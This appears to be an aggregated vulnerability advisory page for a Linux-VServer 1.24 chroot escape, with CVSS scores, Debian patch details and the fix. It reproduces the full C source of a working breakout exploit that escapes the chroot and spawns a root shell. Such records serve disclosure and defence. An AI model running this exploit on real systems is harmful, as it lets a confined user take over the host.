Published: 2004-02-06 00:00:00
Revised: 2008-09-05 16:43:07

[Original] Linux-VServer 1.24 allows local users with root privileges on a virtual server to gain access to the filesystem outside the virtual server via a modified chroot-again exploit using the chmod command.

[CNNVD] Linux VServer Project CHROOT Environment Escape Vulnerability (CNNVD-200402-030)


- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files are exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required for exploitation]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  XF  linux-vserver-gain-privileges(15073)
(VENDOR_ADVISORY)  BUGTRAQ  20040206 Linux 2.4.24 with vserver 1.24 exploit

- Vulnerability information

Linux VServer Project CHROOT Environment Escape Vulnerability
High risk  Other
2004-02-06 00:00:00 2005-10-20 00:00:00

- Advisories and patches

DSA-1011-1: New kernel-patch-vserver packages fix root exploit

Source archives:
Size/MD5 checksum: 637 415731be72a9cd966e2fdb5d4f408c4a
Size/MD5 checksum: 950447 fe6b34612095d2fbdbaab5aefbd83264
Size/MD5 checksum: 752 e32069a5ca2ef2bc87794cd6c2160821
Size/MD5 checksum: 115947 d0bb2cd998a73905189ee24b5f46dd0d
Size/MD5 checksum: 677831 b315f375b1cef48da1b644dec18f22bd

Architecture independent components:
Size/MD5 checksum: 436934 b50048ea819d150d660ed96e3988613b

Alpha architecture:
Size/MD5 checksum: 600660 e52fe0ff93e4c9ca7d58fe8386ebab5a

AMD64 architecture:
Size/MD5 checksum: 429530 c4155982844c085b7d9bc59d7eaa02c4

Intel IA-32 architecture:
Size/MD5 checksum: 398794 56831faa6fa6d76c601fee78251f50eb

Intel IA-64 architecture:
Size/MD5 checksum: 640332 ab2b2e4283ca5b62c9d9cf5776b6dadb

Big endian MIPS architecture:
Size/MD5 checksum: 612918 e4a60532f25ce776880261de79278e85

Little endian MIPS architecture:
Size/MD5 checksum: 614152 f3aee29aad2682878f8ed22064f3fafa

PowerPC architecture:
Size/MD5 checksum: 425444 9a7542249c2b70661abab2afd5270462

IBM S/390 architecture:
Size/MD5 checksum: 440880 376560971a0d2db4bfd51beb67d42bff

Sun Sparc architecture:
Size/MD5 checksum: 395640 51e24ac4754b1aa41277378ee9271a1f

1. Install the patch packages manually:
 # wget url (url is the download link of the patch)
 # dpkg -i file.deb (file is the name of the corresponding patch package)
2. Install the patch packages automatically with apt-get:
 # apt-get update
 # apt-get upgrade

- Vulnerability information (23658)

Linux VServer Project 1.2x CHRoot Breakout Vulnerability (EDBID:23658)
linux local
2004-02-06 Verified
0 Markus Mueller
N/A

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.

/* modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <stdio.h>      /* perror, printf */
#include <stdlib.h>     /* exit */
#include <unistd.h>     /* chdir, chroot, execl */
#include <sys/types.h>
#include <sys/stat.h>   /* mkdir, chmod, S_IXOTH */

int main(void)
{
  int i;

  if (chdir("/") != 0) {
    perror("cd /"); exit(1);
  }
  /* a failed mkdir is not fatal: the directory may already exist */
  if (mkdir("baz", 0777) != 0) {
    perror("mkdir baz");
  }
  if (chroot("baz") != 0) {
    perror("chroot baz"); exit(1);
  }

  for (i = 0; i < 50; i++) {
    if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
    }
    if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
    }
  }
  if (chroot(".") != 0) {
    perror("chroot ."); exit(1);
  }
  printf("Exploit seems to work. =)\n");
  execl("/bin/sh", "sh", "-i", (char *)0);
  perror("exec sh");
  return 1;
}

- Vulnerability information

Linux VServer Chroot Escape
Local Access Required Authentication Management, Other
Exploit Public

- Vulnerability description

Linux-Vserver contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker breaks the chroot jail and is able to traverse other directories. This flaw may lead to a loss of confidentiality.

- Timeline

2004-02-06 2004-02-06
Unknown Unknown

- Solution

Upgrade to version 1.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete